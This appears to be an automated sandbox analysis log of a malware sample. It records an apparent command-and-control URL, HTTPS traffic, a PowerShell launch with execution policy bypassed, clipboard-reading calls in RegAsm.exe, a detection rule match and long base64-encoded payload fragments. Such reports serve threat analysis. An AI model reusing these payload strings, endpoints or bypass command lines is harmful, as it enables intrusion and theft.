              Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apiuser
              Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000005.00000002.1737453939.000000000530C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=
              Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_004329C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_004329C0

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 5.2.powershell.exe.51b66dc.2.raw.unpack, Sap.csLong String: Length: 18812
              Source: 5.2.powershell.exe.86d0000.3.raw.unpack, Sap.csLong String: Length: 18812
              Source: 5.2.powershell.exe.51a01c4.1.raw.unpack, Sap.csLong String: Length: 18812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004088508_2_00408850
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004238608_2_00423860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004218A08_2_004218A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042DA538_2_0042DA53
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043ECA08_2_0043ECA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437DF08_2_00437DF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004096C18_2_004096C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004266D08_2_004266D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043F7208_2_0043F720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004157998_2_00415799
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004388108_2_00438810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041682D8_2_0041682D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004288CB8_2_004288CB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043D8808_2_0043D880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004309408_2_00430940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004039708_2_00403970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004209398_2_00420939
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004179C18_2_004179C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004231C28_2_004231C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004241C08_2_004241C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043B1D08_2_0043B1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004291DD8_2_004291DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043D9808_2_0043D980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004059908_2_00405990
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004221908_2_00422190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043D9978_2_0043D997
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043D9998_2_0043D999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004091B08_2_004091B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042CA498_2_0042CA49
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004162638_2_00416263
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040EA108_2_0040EA10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004152208_2_00415220
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042CAD08_2_0042CAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004252DD8_2_004252DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B2E08_2_0041B2E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004062808_2_00406280
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043DA808_2_0043DA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041E2908_2_0041E290
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB408_2_0041CB40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043D34D8_2_0043D34D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00426B508_2_00426B50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043DB608_2_0043DB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00436B088_2_00436B08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042830D8_2_0042830D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042CB118_2_0042CB11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004043208_2_00404320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042CB228_2_0042CB22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004253278_2_00425327
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004083308_2_00408330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043F3308_2_0043F330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042A33F8_2_0042A33F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040DBD98_2_0040DBD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004243808_2_00424380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041FC758_2_0041FC75
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041DC008_2_0041DC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00429C2B8_2_00429C2B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004291DD8_2_004291DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004074F08_2_004074F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040ACF08_2_0040ACF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041148F8_2_0041148F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042AC908_2_0042AC90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040CD468_2_0040CD46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004375008_2_00437500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004225108_2_00422510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00417DEE8_2_00417DEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004095808_2_00409580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041759F8_2_0041759F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00425E708_2_00425E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00436E748_2_00436E74
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004276038_2_00427603
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00425E308_2_00425E30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004286C08_2_004286C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043AEC08_2_0043AEC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004236E28_2_004236E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00405EE08_2_00405EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041DE808_2_0041DE80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00402F508_2_00402F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00420F508_2_00420F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00438F598_2_00438F59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004067108_2_00406710
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00423F208_2_00423F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419F308_2_00419F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004197C28_2_004197C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042DFE98_2_0042DFE9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A7808_2_0040A780
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00411F908_2_00411F90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004187928_2_00418792
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043EFB08_2_0043EFB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408030 appears 42 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414400 appears 65 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 5.2.powershell.exe.51b66dc.2.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 5.2.powershell.exe.51b66dc.2.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
              Source: 5.2.powershell.exe.86d0000.3.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 5.2.powershell.exe.86d0000.3.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
              Source: 5.2.powershell.exe.51a01c4.1.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 5.2.powershell.exe.51a01c4.1.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNp